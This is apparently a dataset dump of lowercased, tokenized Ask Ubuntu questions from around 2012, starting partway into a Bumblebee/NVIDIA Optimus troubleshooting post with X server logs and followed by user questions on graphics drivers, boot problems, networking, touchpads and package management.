: //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia module=nvidia pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-current : /usr/lib32/nvidia-current # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau and this is my /etc/bublebee/xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` true '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` connectedmonitor '' `` dfp '' endsection it just do n't want to make me happy . ; ) update : this is output of sudo /usr/sbin/bumblebeed -vv -- debug : [ 1031.139866 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 1031.140691 ] [ info ] configured driver : nvidia [ 1031.140757 ] [ debug ] skipping auto-detection , using configured driver 'nvidia' [ 1031.141025 ] [ debug ] process /sbin/modinfo started , pid 3751 . [ 1031.141129 ] [ debug ] hiding stderr for execution of /sbin/modinfo [ 1031.142301 ] [ debug ] sigchild received , but wait failed with no child processes [ 1031.142717 ] [ debug ] process /sbin/modinfo started , pid 3752 . [ 1031.142809 ] [ debug ] hiding stderr for execution of /sbin/modinfo [ 1031.143868 ] [ debug ] sigchild received , but wait failed with no child processes [ 1031.144172 ] [ debug ] process /sbin/modinfo started , pid 3753 . [ 1031.144291 ] [ debug ] hiding stderr for execution of /sbin/modinfo [ 1031.146782 ] [ debug ] sigchild received , but wait failed with no child processes [ 1031.147078 ] [ debug ] process /sbin/modinfo started , pid 3754 . [ 1031.147180 ] [ debug ] hiding stderr for execution of /sbin/modinfo [ 1031.149896 ] [ debug ] sigchild received , but wait failed with no child processes [ 1031.149982 ] [ debug ] bbswitch has been detected . [ 1031.149997 ] [ info ] switching method 'bbswitch ' is available and will be used . [ 1031.150011 ] [ debug ] active configuration : [ 1031.150023 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 1031.150035 ] [ debug ] x display : :8 [ 1031.150047 ] [ debug ] ld_library_path : /usr/lib/nvidia-current : /usr/lib32/nvidia-current [ 1031.150061 ] [ debug ] socket path : /var/run/bumblebee.socket [ 1031.150073 ] [ debug ] pidfile : /var/run/bumblebeed.pid [ 1031.150085 ] [ debug ] xorg.conf file : /etc/bumblebee/xorg.conf.nvidia [ 1031.150098 ] [ debug ] modulepath : /usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules [ 1031.150110 ] [ debug ] gid name : bumblebee [ 1031.150122 ] [ debug ] power method : auto [ 1031.150134 ] [ debug ] stop x on exit : 1 [ 1031.150146 ] [ debug ] driver : nvidia [ 1031.150158 ] [ debug ] driver module : nvidia-current [ 1031.150170 ] [ debug ] card shutdown state : 0 [ 1031.150401 ] [ debug ] process /sbin/modinfo started , pid 3755 . [ 1031.150509 ] [ debug ] hiding stderr for execution of /sbin/modinfo [ 1031.153524 ] [ debug ] sigchild received , but wait failed with no child processes [ 1031.153581 ] [ debug ] configuration test passed . [ 1031.154625 ] [ info ] /usr/sbin/bumblebeed 3.0.1 started [ 1031.154835 ] [ info ] initialization completed - now handling client requests then in other term i ran optirun glxspheres and got optirun glxspheres [ 1520.703053 ] [ error ] can not access secondary gpu - error : x did not start properly [ 1520.703098 ] [ error ] aborting because fallback start is disabled . the first term outputs : [ 1518.419583 ] [ debug ] accepted new connection [ 1518.620300 ] [ info ] switching dedicated card on [ bbswitch ] [ 1519.045660 ] [ debug ] there is no pci configuration space to restore [ 1519.046048 ] [ info ] loading driver nvidia ( module nvidia-current ) [ 1519.046323 ] [ debug ] process modprobe started , pid 4933 . [ 1519.214041 ] [ debug ] process with pid 4933 returned code 0 [ 1519.214317 ] [ info ] starting x server on display :8 . [ 1519.214594 ] [ debug ] process xorg started , pid 4934 . [ 1520.600968 ] [ debug ] [ xorg ] x.org x server 1.13.0 [ 1520.601046 ] [ debug ] process with pid 4934 terminated with 9 [ 1520.601015 ] [ debug ] [ xorg ] release date : 2012-09-05 [ 1520.601085 ] [ debug ] [ xorg ] x protocol version 11 , revision 0 [ 1520.601099 ] [ debug ] [ xorg ] build operating system : linux 3.2.0-26-generic i686 ubuntu [ 1520.601113 ] [ debug ] [ xorg ] current operating system : linux plastic-lap 3.5.0-19-generic # 30-ubuntu smp tue nov 13 17:49:53 utc 2012 i686 [ 1520.601127 ] [ debug ] [ xorg ] kernel command line : boot_image=/boot/vmlinuz-3.5.0-19-generic root=uuid=95400e10-8964-4152-bdaf-65f714178228 ro quiet splash vt.handoff=7 [ 1520.601141 ] [ debug ] [ xorg ] build date : 27 november 2012 07:44:37am [ 1520.601157 ] [ debug ] [ xorg ] xorg-server 2:1.13.0-0ubuntu6.1 ( for technical support please see http : //www.ubuntu.com/support ) [ 1520.601172 ] [ debug ] [ xorg ] current version of pixman : 0.26.0 [ 1520.601184 ] [ debug ] [ xorg ] before reporting problems , check http : //wiki.x.org [ 1520.601200 ] [ debug ] [ xorg ] to make sure that you have the latest version . [ 1520.601215 ] [ debug ] [ xorg ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , [ 1520.601228 ] [ debug ] [ xorg ] ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , [ 1520.601248 ] [ debug ] [ xorg ] ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 1520.601263 ] [ debug ] [ xorg ] ( == ) log file : `` /var/log/xorg.8.log '' , time : sun dec 16 20:13:01 2012 [ 1520.601278 ] [ debug ] [ xorg ] ( ++ ) using config file : `` /etc/bumblebee/xorg.conf.nvidia '' [ 1520.601292 ] [ debug ] [ xorg ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 1520.601306 ] [ debug ] [ xorg ] ( == ) serverlayout `` layout0 '' [ 1520.601319 ] [ debug ] [ xorg ] ( == ) no screen section available . using defaults . [ 1520.601333 ] [ debug ] [ xorg ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 1520.601349 ] [ debug ] [ xorg ] ( ** ) | | -- > monitor `` < default monitor > '' [ 1520.601362 ] [ debug ] [ xorg ] ( == ) no device specified for screen `` default screen section '' . [ 1520.601375 ] [ debug ] [ xorg ] using the first device section listed . [ 1520.601389 ] [ debug ] [ xorg ] ( ** ) | | -- > device `` device1 '' [ 1520.601401 ] [ debug ] [ xorg ] ( == ) no monitor specified for screen `` default screen section '' . [ 1520.601416 ] [ debug ] [ xorg ] using a default monitor configuration . [ 1520.601431 ] [ debug ] [ xorg ] ( ** ) option `` autoadddevices '' `` true '' [ 1520.601443 ] [ debug ] [ xorg ] ( ** ) automatically adding devices [ 1520.601456 ] [ debug ] [ xorg ] ( == ) automatically enabling devices [ 1520.601469 ] [ debug ] [ xorg ] ( == ) automatically adding gpu devices [ 1520.601484 ] [ debug ] [ xorg ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 1520.601497 ] [ debug ] [ xorg ] entry deleted from font path . [ 1520.601513 ] [ debug ] [ xorg ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 1520.601526 ] [ debug ] [ xorg ] entry deleted from font path . [ 1520.601541 ] [ debug ] [ xorg ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 1520.601555 ] [ debug ] [ xorg ] entry deleted from font path . [ 1520.601571 ] [ debug ] [ xorg ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 1520.601585 ] [ debug ] [ xorg ] entry deleted from font path . [ 1520.601606 ] [ debug ] [ xorg ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 1520.601619 ] [ debug ] [ xorg ] entry deleted from font path . [ 1520.601639 ] [ debug ] [ xorg ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 1520.601654 ] [ debug ] [ xorg ] entry deleted from font path . [ 1520.601668 ] [ debug ] [ xorg ] ( == ) fontpath set to : [ 1520.601681 ] [ debug ] [ xorg ] /usr/share/fonts/x11/misc , [ 1520.601695 ] [ debug ] [ xorg ] /usr/share/fonts/x11/type1 , [ 1520.601709 ] [ debug ] [ xorg ] built-ins [ 1520.601723 ] [ debug ] [ xorg ] ( ++ ) modulepath set to `` /usr/lib/nvidia-current/xorg , /usr/lib/xorg/modules '' [ 1520.601738 ] [ debug ] [ xorg ] ( ii ) the server relies on udev to provide the list of input devices . [ 1520.601752 ] [ debug ] [ xorg ] if no devices become available , reconfigure udev or disable autoadddevices . [ 1520.601767 ] [ debug ] [ xorg ] ( ii ) loader magic : 0xb77c4640 [ 1520.601780 ] [ debug ] [ xorg ] ( ii ) module abi versions : [ 1520.601792 ] [ debug ] [ xorg ] x.org ansi c emulation : 0.4 [ 1520.601806 ] [ debug ] [ xorg ] x.org video driver : 13.0 [ 1520.601821 ] [ debug ] [ xorg ] x.org xinput driver : 18.0 [ 1520.601835 ] [ debug ] [ xorg ] x.org server extension : 7.0 [ 1520.601849 ] [ debug ] [ xorg ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 1520.601863 ] [ debug ] [ xorg ] setversion 1.4 failed [ 1520.601877 ] [ debug ] [ xorg ] ( -- ) pci : * ( 0:1:0:0 ) 10de:1051:144d : c0b6 rev 161 , mem @ 0xe0000000/16777216 , 0xb0000000/268435456 , 0xc0000000/33554432 , i/o @ 0x00003000/128 [ 1520.601892 ] [ debug ] [ xorg ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 1520.601904 ] [ debug ] [ xorg ] initializing built-in extension generic event extension [ 1520.601917 ] [ debug ] [ xorg ] initializing built-in extension shape [ 1520.601930 ] [ debug ] [ xorg ] initializing built-in extension mit-shm [ 1520.601942 ] [ debug ] [ xorg ] initializing built-in extension xinputextension [ 1520.601961 ] [ debug ] [ xorg ] initializing built-in extension xtest [ 1520.601974 ] [ debug ] [ xorg ] initializing built-in extension big-requests [ 1520.601986 ] [ debug ] [ xorg ] initializing built-in extension sync [ 1520.602001 ] [ debug ] [ xorg ] initializing built-in extension xkeyboard [ 1520.602014 ] [ debug ] [ xorg ] initializing built-in extension xc-misc [ 1520.602026 ] [ debug ] [ xorg ] initializing built-in extension security [ 1520.602039 ] [ debug ] [ xorg ] initializing built-in extension xinerama [ 1520.602051 ] [ debug ] [ xorg ] initializing built-in extension xfixes [ 1520.602064 ] [ debug ] [ xorg ] initializing built-in extension render [ 1520.602076 ] [ debug ] [ xorg ] initializing built-in extension randr [ 1520.602089 ] [ debug ] [ xorg ] initializing built-in extension composite [ 1520.602101 ] [ debug ] [ xorg ] initializing built-in extension damage [ 1520.602114 ] [ debug ] [ xorg ] initializing built-in extension mit-screen-saver [ 1520.602126 ] [ debug ] [ xorg ] initializing built-in extension double-buffer [ 1520.602139 ] [ debug ] [ xorg ] initializing built-in extension record [ 1520.602154 ] [ debug ] [ xorg ] initializing built-in extension dpms [ 1520.602167 ] [ debug ] [ xorg ] initializing built-in extension x-resource [ 1520.602180 ] [ debug ] [ xorg ] initializing built-in extension xvideo [ 1520.602192 ] [ debug ] [ xorg ] initializing built-in extension xvideo-motioncompensation [ 1520.602205 ] [ debug ] [ xorg ] initializing built-in extension xfree86-vidmodeextension [ 1520.602218 ] [ debug ] [ xorg ] initializing built-in extension xfree86-dga [ 1520.602231 ] [ debug ] [ xorg ] initializing built-in extension xfree86-dri [ 1520.602243 ] [ debug ] [ xorg ] initializing built-in extension dri2 [ 1520.602256 ] [ debug ] [ xorg ] ( ii ) loadmodule : `` glx '' [ 1520.602268 ] [ debug ] [ xorg ] ( ii ) loading /usr/lib/nvidia-current/xorg/libglx.so [ 1520.602281 ] [ debug ] [ xorg ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 1520.602337 ] [ debug ] [ xorg ] compiled for 4.0.2 , module version = 1.0.0 [ 1520.602353 ] [ debug ] [ xorg ] module class : x.org server extension [ 1520.602368 ] [ debug ] [ xorg ] ( ii ) nvidia glx module 304.64 tue oct 30 11:31:18 pdt 2012 [ 1520.602381 ] [ debug ] [ xorg ] loading extension glx [ 1520.602398 ] [ debug ] [ xorg ] ( ii ) loadmodule : `` nvidia '' [ 1520.602410 ] [ debug ] [ xorg ] ( ii ) loading /usr/lib/nvidia-current/xorg/nvidia_drv.so [ 1520.602423 ] [ debug ] [ xorg ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 1520.602436 ] [ debug ] [ xorg ] compiled for 4.0.2 , module version = 1.0.0 [ 1520.602450 ] [ debug ] [ xorg ] module class : x.org video driver [ 1520.602464 ] [ debug ] [ xorg ] ( ii ) nvidia dlloader x driver 304.64 tue oct 30 11:11:05 pdt 2012 [ 1520.602479 ] [ debug ] [ xorg ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 1520.602494 ] [ debug ] [ xorg ] ( -- ) using vt number 7 [ 1520.602507 ] [ debug ] [ xorg ] ( ii ) loading sub module `` fb '' [ 1520.602520 ] [ debug ] [ xorg ] ( ii ) loadmodule : `` fb '' [ 1520.602532 ] [ debug ] [ xorg ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 1520.602544 ] [ debug ] [ xorg ] ( ii ) module fb : vendor= '' x.org foundation '' [ 1520.602557 ] [ debug ] [ xorg ] compiled for 1.13.0 , module version = 1.0.0 [ 1520.602572 ] [ debug ] [ xorg ] abi class : x.org ansi c emulation , version 0.4 [ 1520.602586 ] [ debug ] [ xorg ] ( ii ) loading sub module `` wfb '' [ 1520.602598 ] [ debug ] [ xorg ] ( ii ) loadmodule : `` wfb '' [ 1520.602611 ] [ debug ] [ xorg ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 1520.602623 ] [ debug ] [ xorg ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 1520.602636 ] [ debug ] [ xorg ] compiled for 1.13.0 , module version = 1.0.0 [ 1520.602650 ] [ debug ] [ xorg ] abi class : x.org ansi c emulation , version 0.4 [ 1520.602667 ] [ debug ] [ xorg ] ( ii ) loading sub module `` ramdac '' [ 1520.602679 ] [ debug ] [ xorg ] ( ii ) loadmodule : `` ramdac '' [ 1520.602692 ] [ debug ] [ xorg ] ( ii ) module `` ramdac '' already built-in [ 1520.602704 ] [ debug ] [ xorg ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section [ 1520.602717 ] [ debug ] [ xorg ] `` default screen section '' for depth/fbbpp 24/32 [ 1520.602732 ] [ debug ] [ xorg ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 1520.602744 ] [ debug ] [ xorg ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 1520.602757 ] [ debug ] [ xorg ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 1520.602769 ] [ debug ] [ xorg ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 1520.602782 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : option `` nologo '' `` true '' [ 1520.602794 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : option `` useedid '' `` false '' [ 1520.602810 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : option `` usedisplaydevice '' `` none '' [ 1520.602823 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 1520.602836 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : ignoring edids [ 1520.602848 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : option `` usedisplaydevice '' set to `` none '' ; enabling noscanout [ 1520.602861 ] [ debug ] [ xorg ] ( ** ) nvidia ( 0 ) : mode [ 1520.702963 ] [ error ] x did not start properly [ 1520.803163 ] [ debug ] socket closed . by the way when i run optirun something my screen goes to comand line with full screen of text then i should press ctrl+alt+f7 to go back to my desktop .
228421	bash script wo n't stay open in background after running through while	i ca n't get the following bash script to stay open after the first message is received from nc : # ! /bin/bash port=3333 nc -l $ port | while read msg ; do notify-send alert `` $ msg '' ; done after the first message it exits . i want it to stay open and continue monitoring for new messages from nc . i know that if i launch nc -l port without the while loop it stays open and i can chat away between the two connections even disconnect from the connected host . i am sending the message using : echo 'done ' | nc ip port
228424	how to get bearable 2d and 3d performance on amd radeon hd 6950 ?	i have had an amd radeon hd 6950 ( i.e. , cayman series ) for a couple years now , and i have tried a lot of combinations of drivers and settings with terrible results . i 'm completely at a loss as to how to proceed . the open source driver has much better 2d performance , but it offloads all opengl rendering to the cpu . what i 've tried so far : all the latest stable ubuntu releases in the period , plus one linux mint release . all the latest stable amd catalyst proprietary display drivers , and currently 13.1 . the unofficial wiki installation instructions for every ubuntu version and the semi-official ubuntu instructions . all the tips and tweaks i could find for minecraft ( optifine , reducing settings to minimum ) , vlc ( postprocessing at minimum , rendering at native video size ) , catalyst control center ( flipped every lever in there ) and x11 ( some binary toggles i can no longer remember ) . results : typically 13-15 fps in minecraft , 30 max ( 100+ in windows with the same driver version ) . around 10 fps in team fortress 2 using the official steam client . choppy video playback , in flash and with vlc . cpu use goes through the roof when rendering video ( 150 % for 1080p on youtube in chromium , 100 % for 1080p h264 in vlc ) . glxgears shows 12.5 fps when maximized . fgl_glxgears shows 10 fps when maximized . hardware details from lshw : motherboard asus p6x58d-e cpu intel core i7 cpu 950 @ 3.07ghz ( never overclocked ; 64 bit ) 6 gb ram video card product `` cayman pro [ radeon hd 6950 ] '' , vendor `` hynix semiconductor ( hyundai electronics ) '' 2 x 1920x1200 monitors , both connected with hdmi . i feel i must be missing something absolutely fundamental here . is there no accelerated support for anything on 64-bit architectures ? does a dual monitor completely mess up the driver ? $ fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6900 series opengl version string : 4.2.11995 compatibility profile context $ glxinfo | grep 'direct rendering' direct rendering : yes i am currently using the open source driver , with the following results : full frame rate and low cpu load when playing 1080p video . black screen ( but music in the background ) in team fortress 2 . similar performance in minecraft as the catalyst driver . in hindsight obvious , since both end up offloading the rendering to the cpu . my /var/log/xorg.0.log after upgrading to amd catalyst 13.1 . some possibly important lines : ( ww ) falling back to old probe method for fglrx ( ww ) fglrx : no matching device section for instance ( busid pci:0 @ 3:0:1 ) found the generated xorg.conf . the disabled `` monitor '' 0-dfp9 is actually an a/v receiver , which sometimes confuses the monitor drivers when turned on/off ( but not in windows ) . all three `` monitor '' devices are connected with hdmi . edit : chris carter 's suggestion to use the xorg-edgers ppa ( catalyst 13.1 ) resulted in some improvement , but still pretty bad performance overall : minecraft stabilizes at 13-17 fps , but at least the cpu load is `` only '' at 45-60 % . still 150 % cpu use for 1080p video rendering on youtube in chromium . massive improvement for 1080p h264 in vlc : 40-50 % cpu use and no visible jitter glxgears performance about doubled to 25-30 fps when maximized . fgl_glxgears still at ~10 fps when maximized .
228425	removed java replaced with newest `` sun java '' , disc wo n't boot , and wo n't let me re-install grub using boot repair disc	had a minor problem with my stock market platform . set-up screen would freeze program . called their tech support , got their `` linux guy '' , who advised remove all java and replace , not with synaptic version , but newest sun java . after removing , computer auto rebooted , and went to blue mem-test screen . showed no errors , but could n't get back in . tried two versions of boot repair disc from iso ( checked md5sum , showed good . ) , but fix aborted , giving apt-error detected . opened a terminal and typed ( or copy/paste ) : sudo chroot `` /mnt/boot-sav/sda1 '' apt-get -f install . my system is ubuntu 12.04 . had a few very minor issues from install , all fixed . also added some of my favorite gnome tricks just to make life easier , but none that could have caused this . added script to add shortcuts to desktop , open terminal in any menu from inside it , access root terminal , etc . system was firewalled and using avast antivirus ( o.k. , i 'm paranoid . used to do windows sys-op and security . ) but relative newbie to linux .
228429	how to buy music from ubuntu one using paypal ?	i 'm about to purchase some albums from ubuntu one music , but the payment options does n't provide paypal . it requires a credit card , so is there any option for using paypal ? here is the album : https : //one.ubuntu.com/music-store/release/370827/burzum/filosofem it accepts payment only via credit card , or another way to use paypal instead ?
228432	why wo n't my internet stay connected ?	i recently updated to ubuntu 12.04 , from ubuntu 10.04 , and my internet , usb760 novetel verizon-wireless mobile broadband , will connect after a minute of me starting the computer up . but after a while it will disconnect and the only way to reconnect it is to restart the computer . even then , sometimes it wo n't work . i 've also noticed that since i 've upgraded the computer , the computer will randomly enter into power save mode , and then it will tell me to log back in . i 've done nothing to provoke it , other than using the internet . i was wondering , could the entering into power save mode and the internet disconnecting be somehow connected ? i 've updated the computer every time it asks me to do so , but it does n't seem to be helping . if ubuntu 10.04 would still be supported by next year , i would downgrade . but i have no other choice than to stick with 12.04 . any help would be greatly appreciated ! thanks !
228433	asus all-in-one model et2410iuts-b034c touch screen drivers ubuntu 12.10	bought an asus all-in-one for my 90 year old mom . wo n't let her run windows for security reasons , but would like her to be able to use touch screen . need a how-to for the asus et2410 if it is possible . i do n't know what the touch screen hardware is on this unit . tried the latest ( 0.6.5.0 ) nwfermi driver but got `` dependency is not satisfiable : xf86-input-newxtwindow '' .
228434	how do i boot hp pavilion g6 to display grub2.00 rather than opening windows8 by default ?	with a lot of help from ask ubuntu , i have successfully installed 12.10 onto an hp pavilion g6 2240sa notebook to create a dual boot machine which also has win8 . this could only be achieved by a full bios/grub installation ( not wubi ) . if i press esc on boot up i can get into bios , access grub2.00 and select ubuntu . if i do not access bios on start up the machine runs straight through to win8 making ubuntu inaccessible . i want to switch the machine on and have it boot through to a menu offering ubuntu 12.10 as first choice without forcing win8 on me . how do i do this ? i had one idea - to install the ubuntu boot assistant from the installation dvd in the windows environment - but i 'm afraid to mess things up by installing this software after having installed ubuntu . how can i ensure that i boot to an os option menu ( default preference ubuntu - of course ! ) when i switch the machine on ? here are my installation details
228436	tapping my touchpad is not working ?	i can scroll with with my touchpad and my buttons below touchpad works but i ca n't double tap on my touchpad . if i use the safe then it works . this means touchpad functions correctly . any ideas please to solve the problem ?
228439	khotkey script calling bindings stop to work on switching to quantal	i have many scripts which i call with khotkey . for example i have a hotkey which executes : bk_starts_or_brings.bash 'konsole ' konsole on updating to quantal -- it stops to work : if i call that key -- it searches bk_starts_or_brings.bash 'konsole ' konsole in google in default web-browser . i tried : sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg sudo apt-get install build-essential cdbs dh-make dkms execstack dh-modaliases fakeroot libqtgui4 when i start the command from konsole -- it works as expected , but when i call it with khotkey -- it does n't . i guess someone shadows my keybiding . or some daemon is not run on startup .
228441	how to download kde or gnome from synaptic for offline installation	i know how to install gnome 3 and kde using apt-get . but i want to know how to , only download , from synaptic package manager , these shells . when i search for kubuntu-desktop in synaptic then the download file shows nearly 4mb but i clearly remember the actual size was near > 100 mb . just for information both are already installed in my laptop . so the question is - how to download the actuall > 100 mb kubuntu-desktop so that i can just , without any hesitation install it in offline computer which is using ubuntu 12.04 . same for the gnome 3 . please help me out !
228444	what is used in the 12.10 full disk encryption ?	i previously had been using truecrypt , but recently re-installed ubuntu and used 12.10 's full disk encryption option ( re-installed for other reasons ) . i never got any choice in how it did that . i do n't know what cipher is used or the key size , or anything besides the passphrase really . where can i find details about this sda5_crypt ? edit : seeing this mistake is humorous , but for those curious , sda5 refers to the hard drive and partition , not the encryption system .
228452	dhcp wo n't start / subnetting	i recently changed the ip address on an ubuntu 12.04 server i have in my lab , which is running isc-dhcp-server . after doing so and modifying the dhcpd.conf file , my dhcp service would not start . i basically used the same configuration , except i modified everything to use /25 scopes rather than /24 . when i try to start / restart the service , i see the following : my @ ubuntuserver : ~ $ sudo service isc-dhcp-server restart stop : unknown instance : isc-dhcp-server start/running , process 20918 it looks like it starts , but it is n't actually running and webmin states that the dhcp service is not running . so my question is , does isc-dhcp-server support subnetting ( cidr ) style scopes , or must they be class a / b / c scopes ( does n't seem likely ) ? i 've double checked the interface reference ( this is a vm with only one defined eth0 interface ) and everything else i can thing of .
228454	apt-get could not open lock file	i am trying to get an nfs client running on a sheeva-plug running debian 2.6.22 . the host is ubuntu 12.04 and claims ( from showmount -e ) to be exporting the desired directory . there is no showmount binary in the sheeva-plug , so i 'm trying to install it from the nfs-common package : # apt-get install nfs-common the response ends with e : could not open lock file /var/cache/apt/archives/lock - open ( no such file or directory ) e : unable to lock the download directory . i am root while doing this . similar errors arise when trying to install other packages . how do i correct these errors so apt-get will do its work ?
228459	crackling sound	clean installed ubuntu 12.10 x64 , at first skype was working well , but lately i have crackling noise , the video conversation not understandable , thus echo sound test sound just like that . of course horsing around with blog suggestions , nothing works . any suggestion ?
228462	dell xps 14 touchpad stops working randomly	i 'm using the xps 13 drivers ( i think ) on this ultrabook xps 14 and it works pretty well mostly , though it is a bit too sensitive for my tastes . but randomly it will stop responding completely . my desktop is still functional and my bluetooth mouse still works so it is apparently just the touchpad that has gotten wedged . any suggestions on where to look ?
228465	phpstorm theme installation	i want to install phpstorm color scheme from xml . official phpstorm 's ide website says to install a theme , download the corresponging xml file , copy to ~/library/preferences/rubymine10/colors/ ( mac os x ) or c : \users\ % username % .rubymine10\config\colors\ ( windows ) and restart rubymine . then go to ide settings | editor | colors and select your theme . however , nothing is said about ubuntu . i tried to find anything similar to `` library '' folder inside of phpstorm folder but failed . how can i install the theme ?
228468	how do i scan a document on my hp deskjet 2430 using ubuntu 12.04 ?	i have already downloaded hplip and i got it to work once before , but i do n't remember where to go to select graphics , scan , photo . i ca n't find the menu to access . where is it ?
228469	ubuntu 12.04 unity 3d running slowly	okay so i have done a lot of research on this and i am pretty sure this is just me here but i have spent about two days now trying to get unity 3d to stop lagging so much during animations . the system itself is quick but the animations lag so much it just makes it all so ugly . i am running on the new nvidia 310.19 drivers with better opengl support . i have done plenty of tests to make sure i am hardware accelerated in unity 3d , and everything checks out . why oh why do the animations lag so badly . once you see the specs you will wonder the same thing . intel core 2 duo p7450 2.13 ghz 4gb ddr2 ram 320 gb hdd 7200rpm nvidia gtx260-m 1gb gddr3+cuda < -- -- -- this should more than handle unity 3d also i would like to add that i use the cpu indicator to keep at full performance and i also set nvidia powermizer at full performance also but it does n't help either . i have done preload , unity tweaks ; nothing works . i will give any info needed . even firefox is laggy sometimes and that is just bad .
228471	ubuntu 12 does not boot off live cd	am trying desperately to boot ubuntu 12.10 off a livecd . i get to the startup screen and choose the `` try '' option . it just goes to a black screen with a flashing cursor . i have tried `` nomodeset '' option but it seems to just reboot and not save the setting on the next reboot . what am i doing wrong ? any help would be much appreciated as i am in a bit of a data crisis . need to pull critical files off a raid 0 so i need to boot off cd to access the raid . thanks
228472	after upgrading to 12.04 my system boots to a tty	i 'm a new user to ubuntu and i do n't understand terminal screen it tells me to enter log-in and password and after it tells me to type do-release-upgrade , but when i do this it says no new release found , and it seems to be no way to get out of the screen , what should i do ?
228475	connected to wifi , but quits loading pages after a random amount of time	i 'm using ubuntu 12.10 , on a toshiba satellite l755 laptop , and using a cradlepoint mbr-1000 wireless router . the wifi supposedly works fine on my sisters ' and mom 's laptops , and my dad uses a wired connection through the router . nobody else has the problem . it shows that i 'm connected and everything . the network manager gui shows that everything is going just dandy ... but it 's not . i 'll be able to load a page or two , then i have to disconnect , and reconnect to the router to get it to work again for a couple minutes . i noticed when i was downstairs , close to the router , this problem seemed to go away ( at least , i was connected for a couple of hours without running into this problem ) . when i run ping -n 8.8.8.8 it shows this while the connection is still running fine 64 bytes from 8.8.8.8 : icmp_req=1187 ttl=47 time=665 ms and whe
228476	ubuntu has started booting really slow	so yesterday & today , when i boot up the ubuntu loading screen ( with the 4-5 loading dots ) it just sits there ... forever . normally , ubuntu boots up very fast . also , something very strange i 've noticed is the fan makes this weird sound like it 's running then stopping ... then running again and stopping . at this point i can go into the virtual terminals . it runs veryyyy slow though to actually do anything ( like sudo apt-get upgrade ) as i write this , it occurs to me that the fan might be related to the hard drive or have imminent hard drive failure or something , i 'm just guessing . after 4-5 hard boots ( freezes so i ca n't shut-down normally ) the fan stops making that weird noise of stopping & starting and the computer boots up at normal speed . after 20 minutes of use , it has n't started suddenly either ( i 'm using it atm . ) i would give hard drive specs but i do n't know how to find them .
228478	how to take snapshot of the dash or an indicator menu ?	when we want to take a snapshot of the screen we just press printscreen . but this does n't work in two cases . dash only the windows behind the dash come in the snapshot and not the dash itself . indicator menus when the indicator menus are open , i ca n't take a snapshot at all using printscreen . so , how do i take a snapshot in these cases ?
228479	android device unable to obtain ip address connecting to ap created with hostapd	i have a wired internet connection that works behind an authenticated proxy server . i followed the steps mentioned here and managed to create a hotspot which my google nexus 7 detects . however , it seems stuck at `` obtaining an ip address '' and is not able to connect to the internet . i initially received the following error message when running the script in the terminal : dnsmasq : failed to create listening socket for 127.0.0.1 : address already in use [ fail ] i figured it is because of a conflict with the network manager , i commented out the `` dns=dnsmasq '' line in the nm configuration file . after a network-manager restart , the first error does n't show up but i get the following : configuration file : /etc/hostapd.conf failed to create interface mon.wlan0 : -23 ( too many open files in system ) try to remove and re-create mon.wlan0 in both cases , however , the hotspot is created and is detected by my android device . only that it can not `` obtain an ip address '' and connect to it . is it because my eth0 connects via a proxy server ? or could there be something wrong with the dnsmasq config ? any help would be appreciated .
